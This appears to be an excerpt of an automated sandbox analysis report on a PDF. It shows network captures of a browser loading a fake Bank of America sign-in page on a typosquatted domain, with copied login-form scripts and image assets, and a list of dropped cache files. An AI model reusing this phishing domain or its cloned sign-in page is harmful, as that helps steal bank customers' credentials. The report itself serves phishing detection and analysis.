3b 0a 09 09 09 09 09 24 Data Ascii: ss('displayNone');$('#signin-mobile-app').removeClass('mobile-app'); $('#digital-id-general-error').addClass('hidden');$('#digital-id-success-message').addClass('hidden');$('#enterID-input').parent('div').addClass('hidden');$
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 09 7d 0a 09 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 09 09 7d 2c 32 30 30 30 29 3b 0a 09 09 09 7d 0a 09 09 7d 29 3b 0a 09 7d 29 3b 0a 7d 0a 0a 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 20 7c 7c 20 7b 7d 3b 0a 0a 77 69 6e 64 6f 77 2e 62 6f 61 2e 6f 69 64 56 69 70 61 61 4d 6f 64 75 6c 65 2e 66 6f 72 6d 53 75 62 6d 69 74 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 76 61 72 20 74 68 61 74 20 3d 20 24 28 27 61 5b 6e 61 6d 65 3d 22 65 6e 74 65 72 2d 6f 6e 6c 69 6e 65 2d 69 64 2d 73 75 62 6d 69 74 22 5d 27 29 3b 0a 09 69 66 20 28 20 74 68 61 74 2e 70 61 72 65 6e 74 73 28 27 2e 73 69 6d 70 6c 65 2d 66 6f 72 6d 27 29 2e 61 74 74 72 28 27 69 64 Data Ascii: }}},2000);}});});}window.boa.oidVipaaModule = window.boa.oidVipaaModule \|\| {};window.boa.oidVipaaModule.formSubmit = function(){var that = $('a[name="enter-online-id-submit"]');if ( that.parents('.simple-form').attr('id
2025-01-15 16:43:41 UTC	3704	IN	Data Raw: 09 09 09 09 09 72 65 71 75 69 72 65 64 3a 20 22 50 6f 72 20 66 61 76 6f 72 2c 20 69 6e 64 69 71 75 65 20 74 6f 64 61 20 6c 61 20 69 6e 66 6f 72 6d 61 63 69 26 23 32 34 33 3b 6e 20 73 6f 6c 69 63 69 74 61 64 61 20 70 61 72 61 20 63 6f 6e 74 69 6e 75 61 72 2e 22 0a 09 09 09 09 09 09 09 7d 0a 09 09 09 09 09 7d 2c 0a 09 09 09 09 09 72 75 6c 65 73 3a 20 7b 0a 09 09 09 09 09 09 22 65 6e 74 65 72 49 44 2d 6b 6e 6f 77 6e 2d 69 6e 70 75 74 22 3a 20 7b 0a 09 09 09 09 09 09 09 72 65 71 75 69 72 65 64 20 3a 20 7b 0a 09 09 09 09 09 09 09 64 65 70 65 6e 64 73 3a 20 66 75 6e 63 74 69 6f 6e 28 65 6c 65 6d 65 6e 74 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 72 65 74 75 72 6e 20 24 28 22 23 65 6e 74 65 72 2d 69 64 2d 64 69 76 22 29 2e 69 73 28 22 3a 76 69 73 69 62 6c Data Ascii: required: "Por favor, indique toda la información solicitada para continuar."}},rules: {"enterID-known-input": {required : {depends: function(element) {return $("#enter-id-div").is(":visibl

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:41 UTC	859	OUT	GET /assets/mobile_llama.png HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:41 UTC	251	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:41 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:06:04 GMT ETag: "4adf-611803e998b00" Accept-Ranges: bytes Content-Length: 19167 Connection: close Content-Type: image/png
2025-01-15 16:43:41 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2a 00 00 01 a0 08 03 00 00 00 2a cf da a3 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 04 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 Data Ascii: PNGIHDR**tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20
2025-01-15 16:43:41 UTC	2783	IN	Data Raw: 3b 0f 13 7c ed 40 e5 c8 06 db 66 63 90 57 55 f5 46 d7 aa 4a c6 3e 6e c5 b2 47 7b bc 98 53 7a 58 cc 48 4a 2f f7 c4 7d 1c 57 31 bb 06 eb 64 cc 17 7b d8 7f a4 bc dc 43 81 a2 64 4e 8a 1f 4a 05 bd 24 ff 56 4a f2 51 75 85 aa ec d5 07 1c 51 15 33 bb 2b f3 e2 73 41 9a b3 dc 43 78 c0 e1 84 d9 70 4b 35 78 9c de 09 d7 86 1f 6b c7 89 7b 34 c0 eb de 33 40 99 96 a7 13 dd ec 4e ca fa f4 22 6b 3d a4 d3 e6 bc 14 82 f6 9d 76 dd 9d 4b 7e 6a af 93 a8 24 2b 35 28 ca 5d 05 42 a1 58 96 b3 50 46 70 20 96 68 e1 91 0a 0a 37 b4 ef 0a 7c 83 8a 92 0c 38 29 8f 95 1a 9e 0a a5 04 65 52 7a 51 49 e5 e7 73 a6 d6 21 e6 04 49 95 5a 51 87 51 dd ea 3a 5f 25 b1 77 b0 58 e6 ce c0 9b 61 70 61 24 3d 92 61 0b 14 ed d5 c1 65 fa 32 29 5f 8e a3 f3 77 f3 3f 68 f7 45 c8 43 d5 a9 e1 b2 bb ad 83 dd 26 39 Data Ascii: ;\|@fcWUFJ>nG{SzXHJ/}W1d{CdNJ$VJQuQ3+sACxpK5xk{43@N"k=vK~j$+5(]BXPFp h7\|8)eRzQIs!IZQQ:_%wXapa$=ae2)_w?hEC&9

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:42 UTC	568	OUT	GET /assets/mobile_llama.png HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:42 UTC	251	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:42 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:06:04 GMT ETag: "4adf-611803e998b00" Accept-Ranges: bytes Content-Length: 19167 Connection: close Content-Type: image/png
2025-01-15 16:43:43 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2a 00 00 01 a0 08 03 00 00 00 2a cf da a3 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 04 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 31 31 20 37 39 2e 31 35 38 33 32 35 2c 20 32 30 31 35 2f 30 39 2f 31 30 2d 30 31 3a 31 30 3a 32 30 20 20 Data Ascii: PNGIHDR**tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20
2025-01-15 16:43:43 UTC	2783	IN	Data Raw: 3b 0f 13 7c ed 40 e5 c8 06 db 66 63 90 57 55 f5 46 d7 aa 4a c6 3e 6e c5 b2 47 7b bc 98 53 7a 58 cc 48 4a 2f f7 c4 7d 1c 57 31 bb 06 eb 64 cc 17 7b d8 7f a4 bc dc 43 81 a2 64 4e 8a 1f 4a 05 bd 24 ff 56 4a f2 51 75 85 aa ec d5 07 1c 51 15 33 bb 2b f3 e2 73 41 9a b3 dc 43 78 c0 e1 84 d9 70 4b 35 78 9c de 09 d7 86 1f 6b c7 89 7b 34 c0 eb de 33 40 99 96 a7 13 dd ec 4e ca fa f4 22 6b 3d a4 d3 e6 bc 14 82 f6 9d 76 dd 9d 4b 7e 6a af 93 a8 24 2b 35 28 ca 5d 05 42 a1 58 96 b3 50 46 70 20 96 68 e1 91 0a 0a 37 b4 ef 0a 7c 83 8a 92 0c 38 29 8f 95 1a 9e 0a a5 04 65 52 7a 51 49 e5 e7 73 a6 d6 21 e6 04 49 95 5a 51 87 51 dd ea 3a 5f 25 b1 77 b0 58 e6 ce c0 9b 61 70 61 24 3d 92 61 0b 14 ed d5 c1 65 fa 32 29 5f 8e a3 f3 77 f3 3f 68 f7 45 c8 43 d5 a9 e1 b2 bb ad 83 dd 26 39 Data Ascii: ;\|@fcWUFJ>nG{SzXHJ/}W1d{CdNJ$VJQuQ3+sACxpK5xk{43@N"k=vK~j$+5(]BXPFp h7\|8)eRzQIs!IZQQ:_%wXapa$=ae2)_w?hEC&9

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DEEZI80S.pdf

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Cryptography

Phishing

Compliance

Networking

System Summary

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\c85385f2-b868-4c42-888a-72594431ffd8.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000001.dbtmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\CURRENT (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\MANIFEST-000001

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000001.dbtmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\CURRENT (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\shared_proto_db\metadata\MANIFEST-000001

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-250115164311Z-166.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Windows Analysis Report
DEEZI80S.pdf

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:42 UTC	851	OUT	GET /assets/pill.png HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:42 UTC	249	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:42 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:08:20 GMT ETag: "7e6-6118046b4bd00" Accept-Ranges: bytes Content-Length: 2022 Connection: close Content-Type: image/png
2025-01-15 16:43:42 UTC	2022	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2a 00 00 00 16 08 06 00 00 00 b6 7b 0e 8d 00 00 05 54 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 0a 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 32 2d 63 30 30 30 20 37 39 2e 31 62 36 35 61 37 39 62 34 2c 20 32 30 32 32 2f 30 36 2f 31 33 2d 32 32 3a 30 31 3a 30 31 20 20 20 20 20 20 20 20 22 3e 0a 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68 74 74 70 Data Ascii: PNGIHDR*{TiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79b4, 2022/06/13-22:01:01 "> <rdf:RDF xmlns:rdf="http

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:42 UTC	850	OUT	GET /assets/BOA.PNG HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:42 UTC	252	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:42 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:29:04 GMT ETag: "116c1-6118090daac00" Accept-Ranges: bytes Content-Length: 71361 Connection: close Content-Type: image/png
2025-01-15 16:43:42 UTC	16384	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 51 00 00 00 54 08 06 00 00 00 63 a0 bd 84 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec 7d 07 b8 16 45 d2 b5 01 30 6e 56 10 54 72 56 51 c9 19 c1 04 e6 9c b3 20 e9 92 33 12 25 09 92 41 44 89 22 51 30 93 14 41 44 24 4b ce f9 e6 9c 73 e2 fc e7 54 cf dc 7b 0d eb ae ec ea fe cf f3 bd 75 6f bf 33 d3 33 d3 5d 5d 5d 5d 5d 67 ba a7 e7 02 04 28 40 01 0a 50 80 02 14 a0 00 05 28 40 01 fa c3 e8 dc b9 73 16 7e ba 2f fa e9 f1 8f 48 e7 8a fc e1 5c 3e a3 bc e0 62 dc 56 f7 e7 eb bc 45 78 d7 e5 21 97 21 8f 41 e9 e4 67 67 23 37 25 05 59 67 43 91 b1 7d 2f d2 56 ac 46 d2 e4 d9 88 eb 3d Data Ascii: PNGIHDRQTcsRGBgAMAapHYsodIDATx^}E0nVTrVQ 3%AD"Q0AD$KsT{uo33]]]]]g(@P(@s~/H\>bVEx!!Agg#7%YgC}/VF=
2025-01-15 16:43:43 UTC	16384	IN	Data Raw: 3a 5a 12 94 60 c0 01 a8 76 94 bf eb 94 2f 2a d7 01 95 9b 0e 60 a7 3b 0d 9f ae de e5 ac 8c 1c 26 64 91 1f 39 4f 72 54 14 c7 28 6b e0 4e 9a 8e 67 35 7f 60 ea fb df 10 80 a8 33 65 bd b0 2e 55 5e 03 38 3c be a4 4a 17 d6 4d 2f 8c 99 f1 25 ef 73 49 e9 26 ab 06 ed 5b 9c 3a 4a af b3 b2 ac 5c fa ea 37 2c 8e 75 27 d3 17 97 98 82 37 a6 7c 8e da f7 8d 64 27 23 7d a1 83 41 9d 30 27 c8 0c 6f 07 5c 55 bb 37 9e e8 30 1b 73 97 6c 41 7c 62 2a ef d3 fd 0c 4a 4c 46 ca 3a 1a 19 f9 73 d8 c4 8e b8 c3 90 05 b8 e5 be 11 ee 7e 4d 15 20 b8 28 26 47 8a fa 27 67 45 4f c0 d4 69 bc c6 0e f6 cb 8d 47 58 6f c9 bc 5f fc 79 cc 93 fc e3 9f c6 ff 88 14 ad b2 f9 d7 f1 50 a2 ce b3 32 da 91 0b 2a af 76 bd 38 5d e9 1f 6a ea ca 37 5b 8e 61 d8 a4 cf 51 ef a1 91 b8 be 71 5f fc e9 86 6e ac df ae 28 Data Ascii: :Z`v/`;&d9OrT(kNg5`3e.U^8<JM/%sI&[:J\7,u'7\|d'#}A0'o\U70slA\|bJLF:s~M (&G'gEOiGXo_yP2*v8]j7[aQq_n(
2025-01-15 16:43:43 UTC	16384	IN	Data Raw: 1f 46 ec d3 dd 91 38 72 ba 7d dc 36 fb d0 71 e4 25 a7 21 5f d3 77 99 bf 16 89 70 fe 81 b3 7d 26 75 2b bc db ba 5d ed 48 06 e2 95 76 22 3b 07 d9 31 31 c8 d8 b1 07 a9 f3 3f 44 72 df 31 48 78 a0 1d a2 6e bd df 3e d6 1b 52 da 07 4e 0c e2 4b 40 cf f8 f7 ca c0 a0 a9 87 b6 cc ba 17 ec a3 bf ba 8e 41 53 11 c3 ca f0 da b2 cd 11 d5 f8 09 24 3c df 1b c9 63 de 41 da c7 6b 91 f5 c3 41 e4 45 c6 d8 4a 85 92 a9 ca e0 2f 76 e1 56 74 3c 3f bd 09 80 a8 df 8d a4 3e 52 1e a7 4d 4e a1 1c cd fd 05 10 65 c6 be 92 7b 02 2e 43 ff 7c ef f7 b1 8b 46 31 5a 0b 03 08 bf 4b 59 d9 a0 b2 d9 29 a5 d3 78 24 a7 65 62 e1 8a 6d 78 aa c3 bb b6 f4 ac fb d8 ae 9e b4 69 2b 27 2d 08 25 aa 75 45 b3 c7 26 d0 18 7f 81 43 27 23 d5 fc f8 e7 1a b4 53 ec a2 0a e3 9d 33 45 2a c2 37 b7 66 0c 8c b4 cd c3 b7 Data Ascii: F8r}6q%!_wp}&u+]Hv";11?Dr1Hxn>RNK@AS$<cAkAEJ/vVt<?>RMNe{.C\|F1ZKY)x$ebmxi+'-%uE&C'#S3E*7f
2025-01-15 16:43:43 UTC	16384	IN	Data Raw: 4b 87 a3 4a 0b fc a9 7a 07 0c 78 eb 0b a4 a7 65 a1 b0 48 cb 97 7a 23 36 85 60 42 48 62 45 ca cf 0a 36 8a 26 7c 94 13 c1 3e 6c d8 9a 82 86 9d 27 e0 bc eb 5e a2 b2 95 63 e9 ca c7 d3 94 11 d1 84 8e 9e 56 e7 5b 81 6d 3b e5 44 05 cd 48 7f 2c 96 e4 94 6c 4c 9d b9 1c cf b5 1b cf fa 6a cf 77 64 70 f9 c2 1f 42 4d 83 fb 9f 6a 74 1c 6f 7a 05 95 ea 76 a1 43 a3 a9 3c 12 ee 54 e8 4a 23 50 ac fb 3b 51 11 c5 16 10 ab ff 5e ea ca 23 af 22 f9 d0 bf e8 73 82 d0 89 aa 11 99 ce a7 f4 5a 11 83 69 44 ac 9f 93 6a b5 c2 83 4d de c2 e8 89 df 23 3d 3d c7 f6 da 99 bf 74 2b fe d6 6c 34 8e 24 4d 32 fe a2 3d b7 3e ef 5e ce 6c f9 0b 1b a3 fa 4d 3d d1 b8 d3 44 ac 52 cf 5e 69 61 d0 0f 26 61 13 4b 87 8e 12 3b aa 0b 95 99 07 45 1e b1 c7 f4 4f 39 52 3b f0 a7 4c 54 c9 68 61 fe c2 67 c5 67 36 Data Ascii: KJzxeHz#6`BHbE6&\|>l'^cV[m;DH,lLjwdpBMjtozvC<TJ#P;Q^#"sZiDjM#==t+l4$M2=>^lM=DR^ia&aK;EO9R;LThagg6
2025-01-15 16:43:43 UTC	5825	IN	Data Raw: 62 7e b9 05 00 00 16 a5 49 44 41 54 17 d7 ef 8d e6 1d 27 e1 e3 cf d7 20 bf c4 07 7e 25 2a 82 0c 19 dd 6e ec 28 dc d3 57 7e 36 6e 4d 41 d3 ee da d3 a5 a7 2d e4 a1 6f 0d 8e 65 7e 8e 66 7e 8e 56 f9 32 ee eb 1f 1e 84 e9 73 d7 60 47 72 06 c9 0b 0b 83 e5 62 10 96 94 d3 6c 86 1f 93 54 dc 79 34 b0 7e da b4 13 43 c7 7f 8b da 77 bf 66 fb 5c 1c 4b c5 ac f2 52 3a 9e 06 eb 93 e7 32 3e 4f bd aa 33 fa 8f fa d2 de 2d 5b f0 4a 47 a0 54 2c f2 32 61 2e f6 f4 bc 43 7a 66 2e 1d 88 39 a8 fb c0 1b 56 f7 47 53 71 1d 25 9e 60 5e 8e ab 4a 24 9f a8 97 fd b1 56 a3 f1 ee d4 05 b6 c8 87 ea c0 e2 52 dc 56 fe 42 a5 55 6a 2b 88 6d 4f c9 c4 80 d1 5f d1 41 7a 1d 67 5c d3 89 e5 df dc 78 f0 38 3a 26 c7 55 0d f3 d3 c6 a6 56 5e 70 cb cb 68 db f3 23 7c f6 d5 1a ec a6 f1 a1 da 00 b4 4b 3c cb 5e Data Ascii: b~IDAT' ~%*n(W~6nMA-oe~f~V2s`GrblTy4~Cwf\KR:2>O3-[JGT,2a.Czf.9VGSq%`^J$VRVBUj+mO_Azg\x8:&UV^ph#\|K<^

Timestamp	Bytes transferred	Direction	Data
2025-01-15 16:43:43 UTC	862	OUT	GET /assets/powered_by_logo.svg HTTP/1.1 Host: online.access.secure.bankofamerlica.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://online.access.secure.bankofamerlica.com/login/sign-in/signOnV2Screen.go Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=vj5tl7kjai3kcs1ichp9j5sola; referer=aHR0cHM6Ly9jb25uZWN0YXV0aGVudGljYXRpb24uYmxvYi5jb3JlLndpbmRvd3MubmV0Lw%3D%3D; stp=0; ppath=login%2Fsign-in%2FsignOnV2Screen.go
2025-01-15 16:43:44 UTC	254	IN	HTTP/1.1 200 OK Date: Wed, 15 Jan 2025 16:43:43 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Fri, 16 Feb 2024 14:09:16 GMT ETag: "144a-611804a0b3b00" Accept-Ranges: bytes Content-Length: 5194 Connection: close Content-Type: image/svg+xml
2025-01-15 16:43:44 UTC	5194	IN	Data Raw: 3c 73 76 67 20 68 65 69 67 68 74 3d 22 31 36 22 20 77 69 64 74 68 3d 22 31 33 36 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 4c 61 79 65 72 20 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 33 36 20 31 34 2e 36 22 3e 3c 64 65 66 73 3e 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 64 3d 22 4d 35 33 2e 37 36 20 30 48 31 33 36 76 31 34 2e 36 48 35 33 2e 37 36 7a 22 2f 3e 3c 2f 63 6c 69 70 50 61 74 68 3e 3c 2f 64 65 66 73 3e 3c 70 61 74 68 20 64 3d 22 4d 30 20 31 32 2e 33 56 35 